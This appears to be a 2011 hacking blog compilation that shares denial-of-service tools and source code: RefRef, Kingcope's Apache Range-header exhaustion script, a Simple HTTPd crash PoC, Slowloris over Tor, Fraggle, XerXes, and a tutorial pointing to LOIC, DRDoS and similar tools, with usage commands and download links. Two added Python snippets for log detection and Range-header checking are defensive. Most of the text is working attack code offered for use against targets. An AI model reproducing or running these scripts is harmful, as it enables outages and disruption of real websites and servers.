
Shell Booter full share by HiSoKa

hisoka | 13:48 | 1 comment
Shell Booter supports GET shells and POST shells. Attack time limit: 120 s. Shared by HiSoKa, huydiet.vn



http://www.mediafire.com/?rdk8baxaetvokw5

pass unrar : hisoka

Code GET ,POST shell search with Google.

Video tutorial: using RefRef, the Anonymous DoS tool (Perl source code)

hisoka | 00:35 | 13 comments


Video made by HiSoKa:

Video download here: http://www.mediafire.com/?vm75f62m8dwxwr2


Install Perl,
then run: perl -MCPAN -e "install LWP::UserAgent"
Usage: perl file.pl victim

#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?
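
For defenders, the request this script sends is easy to find in web server access logs, because the appended benchmark(...) call ends up in the request target. The log scan below is an added example, not part of the original post or of RefRef; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (.*?) (HTTP/[\d.]+)" (\d{3}) ')
# MySQL time-burning calls with a numeric first argument, e.g. benchmark(999...
_HEAVY = re.compile(r"\b(benchmark|sleep)\s*\(\s*\d+", re.IGNORECASE)

# Constructed sample log lines (documentation addresses, shortened hex literal).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Aug/2011:10:00:01 +0700] "GET /item.php?id=1%20and%20'
    '(select+benchmark(99999999999,0x70726f62616e646f)) HTTP/1.1" 500 312',
    '198.51.100.7 - - [07/Aug/2011:10:00:07 +0700] "GET /item.php?id=1%20and%20'
    '(select+%2562enchmark(99999999999,0x70726f62616e646f)) HTTP/1.1" 500 312',
    '192.0.2.10 - - [07/Aug/2011:10:00:09 +0700] "GET /search?q=benchmark+results'
    ' HTTP/1.1" 200 5120',
    '192.0.2.10 - - [07/Aug/2011:10:00:11 +0700] "GET /item.php?id=7 HTTP/1.1" 200 901',
]


def decode_target(target, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan(lines):
    """Return (hits, per_client): hits are (ip, function, status) tuples."""
    hits, per_client = [], Counter()
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, _method, target, _proto, status = m.groups()
        found = _HEAVY.search(decode_target(target))
        if found:
            hits.append((ip, found.group(1).lower(), int(status)))
            per_client[ip] += 1
    return hits, per_client


if __name__ == "__main__":
    hits, per_client = scan(SAMPLE_LOG)
    for ip, count in per_client.most_common():
        print("%s sent %d request(s) with a timing function in the URL" % (ip, count))
```

A hit only shows that the payload reached the web server; the underlying fix is parameterized queries, so that the appended SQL is never executed.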

Apache httpd Remote Denial of Service (memory exhaustion)

hisoka | 06:35 | 0 comments
Tested and works very well. Run it with Perl, and remember to install its 2 modules.

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
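
On the server side, the header built above stands out because it packs about 1300 overlapping byte ranges into a single request. The check below is an added example (not Kingcope's code and not Apache's own fix) that parses a Range header and rejects it when it carries too many or overlapping ranges; the limit of 5 and all function names are assumptions.

```python
import re

MAX_RANGES = 5  # assumed policy threshold; tune per application
_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_ranges(header_value):
    """Parse 'bytes=a-b,c-,...' into (first, last) pairs.

    last is infinity for open-ended 'a-'; suffix ranges '-n' come back as
    (None, n). Raises ValueError on anything that is not a bytes range list.
    """
    unit, sep, specs = header_value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("not a bytes range")
    out = []
    for spec in specs.split(","):
        m = _SPEC.match(spec.strip())
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("malformed range spec: %r" % spec)
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else float("inf")
        out.append((first, last))
    return out


def assess_range_header(header_value, max_ranges=MAX_RANGES):
    """Return (verdict, reasons); verdict is 'allow' or 'reject'."""
    try:
        ranges = parse_ranges(header_value)
    except ValueError as exc:
        return "reject", [str(exc)]
    reasons = []
    if len(ranges) > max_ranges:
        reasons.append("%d ranges exceeds limit %d" % (len(ranges), max_ranges))
    # Overlap check on satisfiable first-last ranges, sorted by start offset.
    spans = sorted((f, l) for f, l in ranges if f is not None and f <= l)
    overlaps, reach = 0, -1
    for first, last in spans:
        if first <= reach:
            overlaps += 1
        reach = max(reach, last)
    if overlaps:
        reasons.append("%d overlapping ranges" % overlaps)
    return ("reject" if reasons else "allow"), reasons


# Constructed sample in the shape the script above builds: 0-,5-0,5-1,...,5-1299
SAMPLE_FLOOD = "bytes=0-" + "".join(",5-%d" % k for k in range(1300))
```

The same policy can be enforced in front of the application, for example by having a reverse proxy drop or strip Range headers that fail this check.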

Simple HTTPd 1.42 Denial of Service Exploit

hisoka | 03:40 | 0 comments
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.

import socket, sys


buf = "A" * 6000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))

s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()

Low Orbit Ion Cannon + download

hisoka | 07:37 | 2 comments


download

http://www.mediafire.com/?ciplk3icr03n3w1

pass : my name

Slowloris with a twist over tor

hisoka | 07:20 | 1 comment





http://seclists.org/fulldisclosure/2011/Jul/84


source code :


/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Slowloris with a twist over tor
* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*
* Due to the alpha version of this code being leaked I've decided
* to release an improved version to fully show this method of
* attack mostly free of the bugs / dependency on torsocks. This
* attack works on a similar idea of slowloris only it sends packets
* containing a single 0x00 and optionally nothing causing Apache
* to keep the connection alive almost indefinitely.
*
* Due to no one knowing how th3j35t3r's XerXes works I can not say
* if this is the same method. This was one of my many ideas I was
* exploring as to how it could possibly work that has some successful
* results.
*
* - SanguineRose / William Welna
*
* Leaked Version
* http://seclists.org/fulldisclosure/2011/Jul/84
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires
* mass amounts of threads handling only a few connections each, since this is a POC I will leave
* it up to others to fix that. It also has limited success/attack lengths due to tor being slow
*/
#define CONNECTIONS 3
#define THREADS 148

typedef struct {
const char *host, *port;
} thread_args;

// Simple debug function
void dump_array(char *name, char *data, int size) {
int x, z, indent = strlen(name) + 2;
fprintf(stderr, "%s { ", name);
for(x=0; x < size; x++) { for(z=0; z < indent; z++) putc(0x20, stderr); fprintf(stderr, "%20x\n", data[x]); } fprintf(stderr, "};\n"); } int make_socket(const char *host, const char *port) { struct addrinfo hints, *servinfo, *p; int sock, r, y=1; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); return -1; } for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
return -2;
}
if(servinfo)
freeaddrinfo(servinfo);
return sock;
}

/* Opens SOCKS5 connection to tor
* I also dedicate this function to pr0f <3 */ int pr0f_loves_me_tor_connect(const char *host, const char *port) { char *buf = calloc(1024, sizeof(char)); short l = strlen(host), t; int x, sock; fprintf(stderr, "[Connect %s:%s]\n", host, port); if((sock=make_socket("127.0.0.1", "9050"))<0) { free(buf); return sock; } write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain read(sock, buf, 1024); if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) { free(buf); return -3; // Auth not accepted by socks server / wrong version } buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l; for(x=0; x < l; x++) buf[5+x] = host[x]; x=l+5; t = htons(atoi(port)); memcpy((buf+x), &t, 2); //dump_array("final_request", buf, x+2); write(sock, buf, x+2);// send request read(sock, buf, 1024); if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success free(buf); return sock; } free(buf); return -4; // Unable to conect } // This is for the SIGPIPE error on bad connections / premature closing void broke(int s) { // do nothing } void *attack(void *arg) { thread_args *a = (thread_args *)arg; int x, r, socks[CONNECTIONS]; fprintf(stderr, "[Thread Started]\n"); for(x=0; x < CONNECTIONS; x++) socks[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x < CONNECTIONS; x++) { if(socks[x] <= 0) { socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
}
if(write(socks[x], "\0", 1) < 0) { close(socks[x]); fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]); socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
}
}
usleep(100000);
}
}

void do_help(char *n) {
fprintf(stderr, "Usage: %s \n");
exit(0);
}

void *cycle_identity() {
int sock = make_socket("localhost", "9051");
char *shit_bucket = calloc(1024, sizeof(char));
if(sock < 0) { fprintf(stderr, "Can't connect to tor control port\n"); free(shit_bucket); pthread_exit(NULL); } write(sock, "AUTHENTICATE \"\"\n", 16); while(1) { write(sock, "signal NEWNYM\n", 15); fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
read(sock, shit_bucket, 1024);
sleep(5);
}
}

int main(int argc, char **argv) {
pthread_t threads[THREADS];
pthread_t cycle_tid;
thread_args arg;
void *status;
int x;
if(argc != 3)
do_help(argv[0]);
arg.host = (const char *)argv[1];
arg.port = (const char *)argv[2];
pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
for(x=0; x < THREADS; x++) {
pthread_create(&threads[x], NULL, attack, &arg);
usleep(200000);
}
for(x=0; x < THREADS; x++)
pthread_join(threads[x], &status);
pthread_kill(cycle_tid, 15);
pthread_exit(NULL);
return 0;
}

Fraggle attack v4

hisoka | 15:02 | 1 comment



[QUOTE]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct pktinfo
{
int ps;
int src;
int dst;
};

void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
void sigint (int);
unsigned short checksum (u_short *, int);

int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
int s, num, delay, n, cycle;
char **bcast = malloc(1024), buf[32];
FILE *bfile;

/* banner */
fprintf(stderr, "\nfraggle.c by TFreak\n\n");

/* capture ctrl-c */
signal(SIGINT, sigint);

/* check for enough cmdline args */
if (argc < 5) { fprintf(stderr, "usage: %s "
" [dstport] [srcport] [psize] \n\n"
"target\t\t= address to hit\n"
"bcast file\t= file containing broadcast addrs\n"
"num packets\t= send n packets (n = 0 is constant)\n"
"packet delay\t= usleep() between packets (in ms)\n"
"dstport\t\t= port to hit (default 7)\n"
"srcport\t\t= source port (0 for random)\n"
"ps\t\t= packet size\n\n",
argv[0]);
exit(-1);
}

/* get port info */
if (argc >= 6)
p.dst = atoi(argv[5]);
else
p.dst = 7;
if (argc >= 7)
p.src = atoi(argv[6]);
else
p.src = 0;

/* packet size redundant if not using echo port */
if (argc >= 8)
p.ps = atoi(argv[7]);
else
p.ps = 1;

/* other variables */
num = atoi(argv[3]);
delay = atoi(argv[4]);

/* resolve host */
if (isdigit(*argv[1]))
sin.sin_addr.s_addr = inet_addr(argv[1]);
else
{
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Can't resolve hostname!\n\n");
exit(-1);
}

memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);

/* open bcast file and build array */
if ((bfile = fopen(argv[2], "r")) == NULL)
{
perror("opening broadcast file");
exit(-1);
}
n = 0;
while (fgets(buf, sizeof buf, bfile) != NULL)
{
buf[strlen(buf) - 1] = 0;
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
continue;
bcast[n] = malloc(strlen(buf) + 1);
strcpy(bcast[n], buf);
n++;
}
bcast[n] = '\0';
fclose(bfile);

/* check for addresses */
if (!n)
{
fprintf(stderr, "Error: No valid addresses in file!\n\n");
exit(-1);
}

/* create our raw socket */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) { perror("creating raw socket"); exit(-1); } printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (n = 0, cycle = 0; n < num || !num; n++) { if (!(n % 25)) { printf("."); fflush(stdout); } srand(time(NULL) * rand() * getpid()); fraggle(s, &sin, inet_addr(bcast[cycle]), &p); if (bcast[++cycle] == NULL) cycle = 0; usleep(delay); } sigint(0); } void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p) { struct iphdr *ip; struct udphdr *udp; char *packet; int r; packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr));

memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);

/* ip header */
ip->protocol = IPPROTO_UDP;
ip->saddr = sin->sin_addr.s_addr;
ip->daddr = dest;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip->ihl = 5;
ip->frag_off = 0;
ip->check = checksum((u_short *)ip, sizeof(struct iphdr));

/* udp header */
udp->len = htons(sizeof(struct udphdr) + p->ps);
udp->dest = htons(p->dst);
if (!p->src)
udp->source = htons(rand());
else
udp->source = htons(p->src);

/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
if (r == -1)
{
perror("\nSending packet");
exit(-1);
}

free(packet); /* free willy 2! */
}

unsigned short checksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft--;
}

if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}

sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}

void sigint (int ignoremewhore)
{
fprintf(stderr, "\nDone!\n\n");
exit(0);
}


[/QUOTE]

XerXes Dos attack source code(wikileaks)

hisoka | 08:41 | 3 comments
This is a fairly new DoS tool, but the hacker group LulzSec has stated that it is Slowloris with changes to the packets. It still makes Apache hold connections open. In my own use I found that to be true. Before a patch is available, go and explore its great power.



[PHP]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);javascript:void(0)
return 0;
}[/PHP]

Layer 7 Dos attack tutorial 2011 by HiSoKa

hisoka | 07:51 | 1 comment
A roundup of all the tools that "work" and were used the most this year. Shared for learning purposes. I take no responsibility if you use them for bad things.
If you repost this anywhere, please keep the name of the author of this post.
The tools include ones that use one or more computers and use proxies, IRC servers, etc. to carry out DDoS.


Layer 7 DoS: One attacker brings down one site tools.


1.Slowloris



Slowloris is probably a very powerful tool
http://ha.ckers.org/slowloris/
Install Perl
and the modules:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

Usage: perl slowloris.pl -dns victim.com



2.HTTP POST 3.6



I shared this tool in early 2010 at xgroup.vn.
Its features are great:
1. Slowheader
2. Slowhttp post
It can take down any server that does not have iptables and mod timeout installed.



3.DDosim



This tool reminds me of the days of using suppernova DC++ hublist, with quite a few nice features such as creating TCP connections, invalid HTTP, valid HTTP, etc.
Download the source code and install it:
cd ..path
./configure
make
make install
Usage: ./ddosim



4.keep-alive attack



Uses the method of holding connections to the server open. I like how this feature works.
PHP source:
http://www.esrun.co.uk/blog/keep-alive-dos-script/
Usage:





5.Low Orbit Ion Cannon Anonymous


This tool is a real pleasure; use it once and you will like it.


There is also a version 2.4 for phones.





6.r-u-dead



Edit the conf file: victim URL, etc.
Attack: python file.py




7.SLOW POST NEWVER BY HISOKA



Automatically rotates the user agent from a very long user-agent list ^^ and runs a slow attack with the POST method against the victim.




8.Smurf 6.0



You are surely familiar with murf2k, so is there anything different in the new version? ^^
Use an IP scanner to help you find the list of IPs for the attack.
This is C source code; compile it and use it on Linux.




9.DRDOS




This is a rather interesting reflection attack method.
Source code: DNSDRDOS.C


With the Perl tool DRDOS v2, 2011 code:



10.Tools Slow dos PURIDDE Goobye ver3.0






Install and use: on XP SP2 with .NET 2.0


Sunday, August 07, 2011 Tutorial by hisoka